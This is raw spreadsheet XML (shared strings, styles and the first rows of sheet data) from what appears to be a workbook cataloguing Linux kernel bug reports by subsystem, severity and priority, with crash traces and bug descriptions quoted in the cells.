    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>crypto</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>block</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mm</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>include</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mm</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>lib</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kernel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>security</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kernel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>crypto</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kernel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>include</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kernel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kernel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mm</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mm</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kernel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kernel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kernel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ipc</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ipc</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kernel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>include</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kernel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>init</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>usr</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>virt</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>init</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>virt</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2002-11-13 15:56 UTC</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>aic94xx/sas_class - intermittent panic/hang on boot - device discovery race condition</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mm</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>severity</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>normal</t>
  </si>
  <si>
    <t>high</t>
  </si>
  <si>
    <t>low</t>
  </si>
  <si>
    <t>blocking</t>
  </si>
  <si>
    <t>enhancement</t>
  </si>
  <si>
    <t>priority</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>P2</t>
  </si>
  <si>
    <t>P1</t>
  </si>
  <si>
    <t>P4</t>
  </si>
  <si>
    <t>P5</t>
  </si>
  <si>
    <t>P3</t>
  </si>
  <si>
    <t>processed severity</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>high</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>high</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>high</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>low</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>null</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Debian sarge on 16x x440 + HT. scsi0 : Adaptec AIC7XXX EISA/VLB/PCI SCSI HBA DRIVER, Rev 6.2.35 &lt;Adaptec aic7899 Ultra160 SCSI adapter&gt; aic7899: Ultra160 Wide Channel A, SCSI Id=7, 32/253 SCBs invalid operand: 0000 [#1] CPU: 5 EIP: 0060:[&lt;b4539c59&gt;] Not tainted EFLAGS: 00010282 EIP is at 0xb4539c59 eax: d8b9cce0 ebx: 00000002 ecx: 8be3f000 edx: b4539c4c esi: 00000000 edi: d7e78ae0 ebp: b38c8870 esp: b4539c68 ds: 007b es: 007b ss: 0068 Process tiotest (pid: 11173, threadinfo=b4538000 task=d8b9cce0) Stack: d859e6e0 00000000 d7e78ae0 b4539d04 caffba00 d8b52180 00000000 00000000 00000006 caffba00 00000000 d7865d10 d859e6e0 8018294f d9418100 8018c689 d859e6e0 d7e78ae0 00000000 00000000 b38c8870 00000000 b38c8870 d859e6e0 Call Trace: [&lt;8018294f&gt;] ext3_get_inode_loc+0x57/0x23c [&lt;8018c689&gt;] journal_get_write_access+0x21/0x34 [&lt;8018348c&gt;] ext3_reserve_inode_write+0x34/0x98 [&lt;8018350a&gt;] ext3_mark_inode_dirty+0x1a/0x34 [&lt;80183577&gt;] ext3_dirty_inode+0x53/0x68 [&lt;80168e99&gt;] __mark_inode_dirty+0x29/0xcc [&lt;80150676&gt;] generic_commit_write+0x76/0x84 [&lt;801812f0&gt;] ext3_ordered_commit_write+0x90/0xb4 [&lt;8013386f&gt;] generic_file_aio_write_nolock+0x85b/0xa40 [&lt;80121a3c&gt;] do_softirq+0x6c/0xcc [&lt;80133b47&gt;] generic_file_aio_write+0x67/0x80 [&lt;8017ef1f&gt;] ext3_file_write+0x2b/0xb7 [&lt;8014d0dd&gt;] do_sync_write+0x81/0xb0 [&lt;8011a5a3&gt;] scheduler_tick+0x6b7/0x6c4 [&lt;8011a5a3&gt;] scheduler_tick+0x6b7/0x6c4 [&lt;8011529d&gt;] smp_apic_timer_interrupt+0x149/0x154 [&lt;8011a62b&gt;] schedule+0x73/0x720 [&lt;8014d1ac&gt;] vfs_write+0xa0/0xd0 [&lt;8014d259&gt;] sys_write+0x31/0x4c [&lt;8010a64f&gt;] syscall_call+0x7/0xb Code: ff ff ff 59 9c 53 b4 60 00 00 00 82 02 01 00 e0 e6 59 d8 00 Sep 24 02:26:14 elm3b67 kernel: invalid operand: 0000 [#1] Sep 24 02:26:14 elm3b67 kernel: CPU: 11 Sep 24 02:26:14 elm3b67 kernel: EIP: 0060:[_end+404081921/1069412752] Not tainted Sep 24 02:26:14 elm3b67 kernel: EFLAGS: 00010206 Sep 24 02:26:14 elm3b67 kernel: EIP is at 0xd857bb71 Sep 24 02:26:14 elm3b67 kernel: eax: 00038815 ebx: 00000002 ecx: cbe4ab20 edx: 00000011 Sep 24 02:26:14 elm3b67 kernel: esi: 00000000 edi: d82c6690 ebp: d4ecd1b0 esp: d857bb80 Sep 24 02:26:14 elm3b67 kernel: ds: 007b es: 007b ss: 0068 Sep 24 02:26:14 elm3b67 kernel: Process dbench (pid: 20747, threadinfo=d857a000 task=d4015900) Sep 24 02:26:14 elm3b67 kernel: Stack: cf768ea4 00000000 d82c6690 d857bc1c d8841400 d5f0a180 00000000 00000000 Sep 24 02:26:14 elm3b67 kernel: 00818006 d8841400 00000000 d5489310 cf768ea4 c017f65f cc218280 c01892b9 Sep 24 02:26:14 elm3b67 kernel: cf768ea4 d82c6690 00000000 00000000 d4ecd1b0 00000000 d4ecd1b0 cf768ea4 Sep 24 02:26:14 elm3b67 kernel: Call Trace: Sep 24 02:26:14 elm3b67 kernel: [ext3_get_inode_loc+87/572] ext3_get_inode_loc+0x57/0x23c Sep 24 02:26:14 elm3b67 kernel: [journal_get_write_access+33/52] journal_get_write_access+0x21/0x34 Sep 24 02:26:14 elm3b67 kernel: [ext3_reserve_inode_write+52/152] ext3_reserve_inode_write+0x34/0x98 Sep 24 02:26:14 elm3b67 kernel: [ext3_mark_inode_dirty+26/52] ext3_mark_inode_dirty+0x1a/0x34 Sep 24 02:26:14 elm3b67 kernel: [ext3_splice_branch+209/388] ext3_splice_branch+0xd1/0x184 Sep 24 02:26:14 elm3b67 kernel: [ext3_get_block_handle+479/640] ext3_get_block_handle+0x1df/0x280 Sep 24 02:26:14 elm3b67 kernel: [ext3_get_block+96/104] ext3_get_block+0x60/0x68 Sep 24 02:26:14 elm3b67 kernel: [__block_prepare_write+300/972] __block_prepare_write+0x12c/0x3cc Sep 24 02:26:14 elm3b67 kernel: [block_prepare_write+33/56] block_prepare_write+0x21/0x38 Sep 24 02:26:14 elm3b67 kernel: [ext3_get_block+0/104] ext3_get_block+0x0/0x68 Sep 24 02:26:14 elm3b67 kernel: [ext3_prepare_write+69/216] ext3_prepare_write+0x45/0xd8 Sep 24 02:26:14 elm3b67 kernel: [ext3_get_block+0/104] ext3_get_block+0x0/0x68 Sep 24 02:26:14 elm3b67 kernel: [generic_file_aio_write_nolock+1693/2608] generic_file_aio_write_nolock+0x69d/0xa30 Sep 24 02:26:14 elm3b67 kernel: [generic_file_aio_write+103/128] generic_file_aio_write+0x67/0x80 Sep 24 02:26:14 elm3b67 kernel: [ext3_file_write+43/183] ext3_file_write+0x2b/0xb7 Sep 24 02:26:14 elm3b67 kernel: [do_sync_write+129/176] do_sync_write+0x81/0xb0 Sep 24 02:26:14 elm3b67 kernel: [sys_fstat64+37/48] sys_fstat64+0x25/0x30 Sep 24 02:26:14 elm3b67 kernel: [vfs_write+160/208] vfs_write+0xa0/0xd0 Sep 24 02:26:14 elm3b67 kernel: [sys_pwrite64+64/92] sys_pwrite64+0x40/0x5c Sep 24 02:26:14 elm3b67 kernel: [syscall_call+7/11] syscall_call+0x7/0xb Sep 24 02:26:14 elm3b67 kernel: Sep 24 02:26:14 elm3b67 kernel: Code: ff ff ff 71 bb 57 d8 60 00 00 00 06 02 01 00 a4 8e 76 cf 00</t>
  </si>
  <si>
    <t>Subject : [BUG 2.6.30_rc5] Null pointer dereference in rtc-cmos driver Submitter : Ozan Çağlayan &lt;ozan@pardus.org.tr&gt; Date : 2009-05-14 16:16 References : http://marc.info/?l=linux-kernel&amp;m=124231783704696&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>I'm having a serious CPU hogging problem with an HP Elitebook 8540w running 2.6.36_rc6. A kworker consumes ~100% CPU during all the uptime since booting. I first tried rmmod'ing all the modules but it didn't help. Then I built the kernel with some ACPI/PM verbose flags turned on and found out that an infinite number of the following message was written in kernel log: scsi host1: __pm_runtime_resume() returns 1! I then passed "on\n" to all power/control files in sysfs but the messages didn't disappear. I disabled PM_RUNTIME to see if it was causing the kworker stuff, but nope, it still continues. Then I found a similar report and tried writing "disable" to /sys/firmware/acpi/interrupts/gpe01 and it stopped the kworker CPU consumation problem *although the load average doesn't drop under ~1.3*. When enabled the number of interrupts in /sys/firmware/acpi/interrupts/gpe01 increases very fast. The problem is not fixed with the pcie_pme=off trick suggested in the other bug report related to this laptop. (CC'ing İbrahim, the owner of the laptop) Thanks</t>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>block</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>s</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>ound</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>lib</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>pcmcia broken (pcibios_read_config_dword)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</si>
</sst>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_ "/>
  </numFmts>
  <fonts count="5" x14ac:knownFonts="1">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="等线"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="等线"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="等线"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>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rgb="FF7030A0"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="1">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="1">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="20">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="常规" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="0"/>
  <tableStyles count="0" defaultTableStyle="TableStyleMedium2" defaultPivotStyle="PivotStyleLight16"/>
  <colors>
    <mruColors>
      <color rgb="FFFC8D62"/>
      <color rgb="FF66C2A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4379"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScaleNormal="100" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="8.6640625" style="12"/>
    <col min="2" max="2" width="10.33203125" style="12" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="22.58203125" style="12" bestFit="1" customWidth="1"/>
    <col min="4" max="6" width="22.58203125" style="12" customWidth="1"/>
    <col min="7" max="7" width="57.83203125" style="12" customWidth="1"/>
    <col min="8" max="8" width="16.4140625" style="12" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="23.33203125" style="12" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="29.75" style="12" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="12.58203125" style="12" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="14.6640625" style="12" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="14.6640625" style="12" customWidth="1"/>
    <col min="14" max="14" width="20.08203125" style="12" bestFit="1" customWidth="1"/>
    <col min="15" max="15" width="14.6640625" style="12" customWidth="1"/>
    <col min="16" max="17" width="35.5" style="12" customWidth="1"/>
    <col min="18" max="18" width="11.4140625" style="12" bestFit="1" customWidth="1"/>
    <col min="19" max="19" width="20.5" style="12" bestFit="1" customWidth="1"/>
    <col min="20" max="20" width="27.9140625" style="12" bestFit="1" customWidth="1"/>
    <col min="21" max="21" width="20.5" style="12" bestFit="1" customWidth="1"/>
    <col min="22" max="22" width="45.75" style="12" bestFit="1" customWidth="1"/>
    <col min="23" max="23" width="21.9140625" style="12" customWidth="1"/>
    <col min="24" max="24" width="20.83203125" style="12" bestFit="1" customWidth="1"/>
    <col min="25" max="25" width="56" style="12" customWidth="1"/>
    <col min="26" max="16384" width="8.6640625" style="12"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:25" ht="13.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1" s="11" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="11" t="s">
        <v>28229</v>
      </c>
      <c r="C1" s="11" t="s">
        <v>28230</v>
      </c>
      <c r="D1" s="11" t="s">
        <v>28345</v>
      </c>
      <c r="E1" s="11" t="s">
        <v>31424</v>
      </c>
      <c r="F1" s="11" t="s">
        <v>28869</v>
      </c>
      <c r="G1" s="11" t="s">
        <v>1</v>
      </c>
      <c r="H1" s="11" t="s">
        <v>2</v>
      </c>
      <c r="I1" s="11" t="s">
        <v>3</v>
      </c>
      <c r="J1" s="11" t="s">
        <v>4</v>
      </c>
      <c r="K1" s="11" t="s">
        <v>5</v>
      </c>
      <c r="L1" s="11" t="s">
        <v>6</v>
      </c>
      <c r="M1" s="11" t="s">
        <v>31581</v>
      </c>
      <c r="N1" s="11" t="s">
        <v>31593</v>
      </c>
      <c r="O1" s="11" t="s">
        <v>31587</v>
      </c>
      <c r="P1" s="11" t="s">
        <v>28170</v>
      </c>
      <c r="Q1" s="11" t="s">
        <v>28231</v>
      </c>
      <c r="R1" s="11" t="s">
        <v>7</v>
      </c>
      <c r="S1" s="11" t="s">
        <v>8</v>
      </c>
      <c r="T1" s="11" t="s">
        <v>9</v>
      </c>
      <c r="U1" s="11" t="s">
        <v>10</v>
      </c>
      <c r="V1" s="11" t="s">
        <v>28172</v>
      </c>
      <c r="W1" s="11" t="s">
        <v>28165</v>
      </c>
      <c r="X1" s="11" t="s">
        <v>11</v>
      </c>
      <c r="Y1" s="11" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="2" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2" s="12">
        <v>2</v>
      </c>
      <c r="B2" s="12" t="s">
        <v>29779</v>
      </c>
      <c r="C2" s="12" t="s">
        <v>29781</v>
      </c>
      <c r="D2" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E2" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F2" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G2" s="12" t="s">
        <v>28254</v>
      </c>
      <c r="H2" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J2" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K2" s="12" t="s">
        <v>15</v>
      </c>
      <c r="L2" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M2" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="Q2" s="12">
        <v>2.5</v>
      </c>
      <c r="R2" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2" s="12" t="s">
        <v>31577</v>
      </c>
      <c r="T2" s="12" t="s">
        <v>19</v>
      </c>
      <c r="U2" s="12" t="s">
        <v>24</v>
      </c>
      <c r="V2" s="12" t="s">
        <v>19</v>
      </c>
      <c r="W2" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2" s="12">
        <v>2</v>
      </c>
      <c r="Y2" s="12" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="3" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="12">
        <v>3</v>
      </c>
      <c r="B3" s="12" t="s">
        <v>28341</v>
      </c>
      <c r="C3" s="12" t="s">
        <v>28343</v>
      </c>
      <c r="D3" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F3" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G3" s="12" t="s">
        <v>26</v>
      </c>
      <c r="H3" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J3" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3" s="12" t="s">
        <v>15</v>
      </c>
      <c r="L3" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M3" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="Q3" s="12">
        <v>2.5</v>
      </c>
      <c r="R3" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3" s="12" t="s">
        <v>29</v>
      </c>
      <c r="T3" s="12" t="s">
        <v>19</v>
      </c>
      <c r="U3" s="12" t="s">
        <v>30</v>
      </c>
      <c r="V3" s="12" t="s">
        <v>31</v>
      </c>
      <c r="W3" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3" s="12">
        <v>1</v>
      </c>
      <c r="Y3" s="12" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="4" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4" s="12">
        <v>7</v>
      </c>
      <c r="B4" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C4" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D4" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F4" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4" s="12" t="s">
        <v>34</v>
      </c>
      <c r="H4" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4" s="12" t="s">
        <v>36</v>
      </c>
      <c r="K4" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M4" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="Q4" s="12">
        <v>2.5</v>
      </c>
      <c r="R4" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4" s="12" t="s">
        <v>38</v>
      </c>
      <c r="T4" s="12" t="s">
        <v>39</v>
      </c>
      <c r="U4" s="12" t="s">
        <v>40</v>
      </c>
      <c r="V4" s="12" t="s">
        <v>39</v>
      </c>
      <c r="W4" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4" s="12">
        <v>2</v>
      </c>
      <c r="Y4" s="12" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="5" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A5" s="12">
        <v>9</v>
      </c>
      <c r="B5" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D5" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F5" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G5" s="12" t="s">
        <v>42</v>
      </c>
      <c r="H5" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I5" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J5" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K5" s="12" t="s">
        <v>15</v>
      </c>
      <c r="L5" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M5" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N5" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O5" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="Q5" s="12">
        <v>2.5</v>
      </c>
      <c r="R5" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S5" s="12" t="s">
        <v>45</v>
      </c>
      <c r="T5" s="12" t="s">
        <v>46</v>
      </c>
      <c r="U5" s="12" t="s">
        <v>47</v>
      </c>
      <c r="V5" s="12" t="s">
        <v>48</v>
      </c>
      <c r="W5" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X5" s="12">
        <v>10</v>
      </c>
      <c r="Y5" s="12" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="6" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A6" s="12">
        <v>10</v>
      </c>
      <c r="B6" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D6" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E6" s="12" t="s">
        <v>31426</v>
      </c>
      <c r="F6" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G6" s="12" t="s">
        <v>50</v>
      </c>
      <c r="H6" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I6" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J6" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K6" s="12" t="s">
        <v>15</v>
      </c>
      <c r="L6" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M6" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N6" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O6" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P6" s="12" t="s">
        <v>54</v>
      </c>
      <c r="Q6" s="12">
        <v>2.5</v>
      </c>
      <c r="R6" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S6" s="12" t="s">
        <v>55</v>
      </c>
      <c r="T6" s="12" t="s">
        <v>46</v>
      </c>
      <c r="U6" s="12" t="s">
        <v>56</v>
      </c>
      <c r="V6" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W6" s="12" t="s">
        <v>58</v>
      </c>
      <c r="X6" s="12">
        <v>89</v>
      </c>
      <c r="Y6" s="12" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="7" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A7" s="12">
        <v>14</v>
      </c>
      <c r="B7" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D7" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E7" s="12" t="s">
        <v>31427</v>
      </c>
